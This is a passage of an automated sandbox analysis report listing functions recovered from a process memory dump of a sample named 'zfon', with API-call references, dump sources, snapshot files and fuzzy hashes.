                                                                                                                                                                              • Part of subcall function 00007FF79CFB2470: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF79CFB22DB), ref: 00007FF79CFB24FA
                                                                                                                                                                              • Part of subcall function 00007FF79CFD6E90: cef_string_map_alloc.LIBCEF ref: 00007FF79CFD6E99
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB717E
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB718E
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB719E
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB71AB
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB71E4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc$freemallocmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 224831930-0
                                                                                                                                                                            • Opcode ID: f2e0434e812f486bbb2eabc96afd3d91da7e9aae555bade9a89ac74059c309bd
                                                                                                                                                                            • Instruction ID: ef969ef526e86f1dc1ef0e928198cbbe4d53a5c7a218678fe783260eb7e1d379
                                                                                                                                                                            • Opcode Fuzzy Hash: f2e0434e812f486bbb2eabc96afd3d91da7e9aae555bade9a89ac74059c309bd
                                                                                                                                                                            • Instruction Fuzzy Hash: 71917B63B04A4286EF24EB79C4643ACA3B2FB84F98F858436CA4D577A5DF38D445C320
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcmp.VCRUNTIME140 ref: 00007FF79CFC95AC
                                                                                                                                                                              • Part of subcall function 00007FF79CFB1FB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF79CFB219C), ref: 00007FF79CFB1FD5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: mallocmemcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2019052184-0
                                                                                                                                                                            • Opcode ID: d3f66d2b6ad97b184e21337da213452f51ca896170bba51c97c27b9d314203c3
                                                                                                                                                                            • Instruction ID: 51f3ec7aa93530912a74dfe7c0080c3469c39c59cc2c922977c530e0c96c89da
                                                                                                                                                                            • Opcode Fuzzy Hash: d3f66d2b6ad97b184e21337da213452f51ca896170bba51c97c27b9d314203c3
                                                                                                                                                                            • Instruction Fuzzy Hash: 8E71C35774978381EE30AE36AA402B997B1AF46BC4F844835DE4D9B786DF3CE1918360
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3154343008-0
                                                                                                                                                                            • Opcode ID: dbac351c522733198ef531d23818992bc4ed6bb4c5475570b617ac3196796fe6
                                                                                                                                                                            • Instruction ID: 539be1672c6864f9a72d632d05a173c4fb6ff9f00eeadadbbd82088af65f8324
                                                                                                                                                                            • Opcode Fuzzy Hash: dbac351c522733198ef531d23818992bc4ed6bb4c5475570b617ac3196796fe6
                                                                                                                                                                            • Instruction Fuzzy Hash: 63814A73608BC29AEB61DF24E8403EEB7B1FB44748F844126EA8D17A69DF38D545C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: fgetwc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2948136663-0
                                                                                                                                                                            • Opcode ID: 7b092b86c2f800b45fcf13971108f149f52e97cd8681566c45f30ae54ea6449e
                                                                                                                                                                            • Instruction ID: 4d06af96265599114db7ddafb869d4388b171d39052d0a10bb96163037dd5053
                                                                                                                                                                            • Opcode Fuzzy Hash: 7b092b86c2f800b45fcf13971108f149f52e97cd8681566c45f30ae54ea6449e
                                                                                                                                                                            • Instruction Fuzzy Hash: 9D8150B7604A45CAEB50CF39C4903AD33A1FB58B98F50A132EA5E67799DF38D544C710
                                                                                                                                                                            APIs
                                                                                                                                                                            • new.LIBCMT ref: 00007FF79CFB946B
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB9491
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB94FF
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB9532
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB9560
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25C3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25D3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25E3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25F0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturncef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2776152272-0
                                                                                                                                                                            • Opcode ID: 1e3490bca68b8c3274cbeecc2115020831b9076bd9e81532a15e2d3a86fb5802
                                                                                                                                                                            • Instruction ID: 2ff26b3fe0754207093fbc7e59502c36dfc04c138c09139465881f05b1234cfb
                                                                                                                                                                            • Opcode Fuzzy Hash: 1e3490bca68b8c3274cbeecc2115020831b9076bd9e81532a15e2d3a86fb5802
                                                                                                                                                                            • Instruction Fuzzy Hash: DF616E63B04A8284FF24EBB5D4403BCA7B2AB40B98F998535DE5D57B99CF38D941C320
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25C3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25D3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25E3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25F0
                                                                                                                                                                            • new.LIBCMT ref: 00007FF79CFB923F
                                                                                                                                                                              • Part of subcall function 00007FF79D073D44: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF79D073D70
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB9266
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB9302
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB9336
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB9364
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturncef_string_map_alloc$malloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1577610649-0
                                                                                                                                                                            • Opcode ID: 6ace9081bd1f1edd449fb6e0773b42b66ffd3d33c4d8c5aa578f97e1b911971e
                                                                                                                                                                            • Instruction ID: b0ae4c4cc327b25e1d310ae0004c36f574efa4ef52e00ecc4b549d42ebec076d
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ace9081bd1f1edd449fb6e0773b42b66ffd3d33c4d8c5aa578f97e1b911971e
                                                                                                                                                                            • Instruction Fuzzy Hash: 0C519223B05A4284FF20ABB1D8402BC77B6BB44BA8F998135DE5D17B95CF38D945C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: freememcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4020268379-0
                                                                                                                                                                            • Opcode ID: 0a302a5f15a6ffb896fe3f1ed937148e5395896a0c9eb31bcb25d4cdad06a287
                                                                                                                                                                            • Instruction ID: 62c93bf296ea292deedfd030c38aac515f3918f3c10872fe1bf436f3e3e91b9c
                                                                                                                                                                            • Opcode Fuzzy Hash: 0a302a5f15a6ffb896fe3f1ed937148e5395896a0c9eb31bcb25d4cdad06a287
                                                                                                                                                                            • Instruction Fuzzy Hash: 5241C223619B8281EE20AB21E94037AA7B1FB85BE0F545235FEAE07BD5DF3CD0408710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: freememcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4020268379-0
                                                                                                                                                                            • Opcode ID: 12b8396c82e345bc1688e98f6ccbff207033e9e2852a0f582d1375f5ce158e35
                                                                                                                                                                            • Instruction ID: ae50ebd3ea96588cb08d2e9a97468a7232e4b51325c4cba959fc53622764a254
                                                                                                                                                                            • Opcode Fuzzy Hash: 12b8396c82e345bc1688e98f6ccbff207033e9e2852a0f582d1375f5ce158e35
                                                                                                                                                                            • Instruction Fuzzy Hash: 0541C223719B8281EE20AB22E94436EA761FB85BE0F541235EEAE07B95DF3DD440C710
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B425A5
                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B425B3
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B425EC
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B425F6
                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B42604
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memcpymemset$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 530858481-0
                                                                                                                                                                            • Opcode ID: 8df3b8b3b55c4ad0e2b75d810ff762bfc816abf5dc778e1cac203e07009b2fb8
                                                                                                                                                                            • Instruction ID: 8427bb9ed3431097c4d5d97771bfcdd0c855157e12b434b4b65700b73f705b2a
                                                                                                                                                                            • Opcode Fuzzy Hash: 8df3b8b3b55c4ad0e2b75d810ff762bfc816abf5dc778e1cac203e07009b2fb8
                                                                                                                                                                            • Instruction Fuzzy Hash: 7341F3A6B08B8191EF14EF32F50426A6351BB04BE0F489631DE6E2B7D6CE7CE041D750
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FFBC1B4C333), ref: 00007FFBC1B4C617
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FFBC1B4C333), ref: 00007FFBC1B4C648
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FFBC1B4C333), ref: 00007FFBC1B4C680
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FFBC1B4C333), ref: 00007FFBC1B4C68A
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FFBC1B4C333), ref: 00007FFBC1B4C6BB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2665656946-0
                                                                                                                                                                            • Opcode ID: c5414dc02fb282a514dd476fa31f041e2728c0031ac456c67ca1122fc35b3a76
                                                                                                                                                                            • Instruction ID: 9bd62a3b3c7c7cf1cbd458fea9d9325eeed31b51785aa22a444bdfc30a63282f
                                                                                                                                                                            • Opcode Fuzzy Hash: c5414dc02fb282a514dd476fa31f041e2728c0031ac456c67ca1122fc35b3a76
                                                                                                                                                                            • Instruction Fuzzy Hash: 2441F5A6704A4191EF04EF26E4041AA2351FB44FD4F949132EE5D27BA9DE7CE041C750
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2665656946-0
                                                                                                                                                                            • Opcode ID: 46b82a7cf3177d4084a802e0d1aaf4a65ae280c1fa6c272f9c3f0bbded35a758
                                                                                                                                                                            • Instruction ID: c1c26ae6496ecab2bd2b36e9fca661d0468e7a799f12a49d7ce90ddf7fe312f7
                                                                                                                                                                            • Opcode Fuzzy Hash: 46b82a7cf3177d4084a802e0d1aaf4a65ae280c1fa6c272f9c3f0bbded35a758
                                                                                                                                                                            • Instruction Fuzzy Hash: 393102AA708A4192EF00AF22E9041AB6351FB48FD0F585532EF5E6BB96CE7CE051C744
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NameName::$Name::operator+
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 826178784-0
                                                                                                                                                                            • Opcode ID: f8c65f689e74ec1d19f277c4e47f913f6a8a81dfac6f18ea7d1e3c5bf52b630d
                                                                                                                                                                            • Instruction ID: b376c60008ec223a80b93e38e36cb2f82069e855514cbe2820c23dc50a97e694
                                                                                                                                                                            • Opcode Fuzzy Hash: f8c65f689e74ec1d19f277c4e47f913f6a8a81dfac6f18ea7d1e3c5bf52b630d
                                                                                                                                                                            • Instruction Fuzzy Hash: E34184ABA1868698E710CF31D8902BE37A5BF157C0B666032DA4D73795DF38E555CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3154343008-0
                                                                                                                                                                            • Opcode ID: c7be93b47b78dac1e6dca633dd4509a2773a55bac6c05f665f9044a2a3758c04
                                                                                                                                                                            • Instruction ID: 13c7f7e616cf4c54aabc7efbefe90643d1374bd588f739bead10ba686f7dd27e
                                                                                                                                                                            • Opcode Fuzzy Hash: c7be93b47b78dac1e6dca633dd4509a2773a55bac6c05f665f9044a2a3758c04
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A416D73618A8691EF60DF29E8507A9F761FB88B88F885031EB8E47A54DF3CD545C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3856544966-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3154343008-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3154343008-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3154343008-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3154343008-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xtime_diff_to_millis2xtime_get$Mtx_reset_owner
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 638720424-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF79CFD7965), ref: 00007FF79CFD9169
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF79CFD7965), ref: 00007FF79CFD917E
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF79CFD7965), ref: 00007FF79CFD918E
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF79CFD7965), ref: 00007FF79CFD919E
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF79CFD7965), ref: 00007FF79CFD91AB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3063020102-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF79CFCE241
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFCE26A
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFCE27A
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFCE28A
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFCE297
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$strtoul
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1658144056-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$setlocale
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 294139027-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC8CB5
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC8CCE
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC8CDE
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC8CEE
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC8CFB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFEDE03
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFEDE1F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFEDE2F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFEDE3F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFEDE4C
                                                                                                                                                                            Memory Dump Source
